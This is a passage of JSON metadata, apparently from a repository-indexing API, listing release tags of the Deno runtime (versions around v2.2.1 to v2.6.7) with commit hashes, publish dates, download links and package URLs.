ncy_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.eco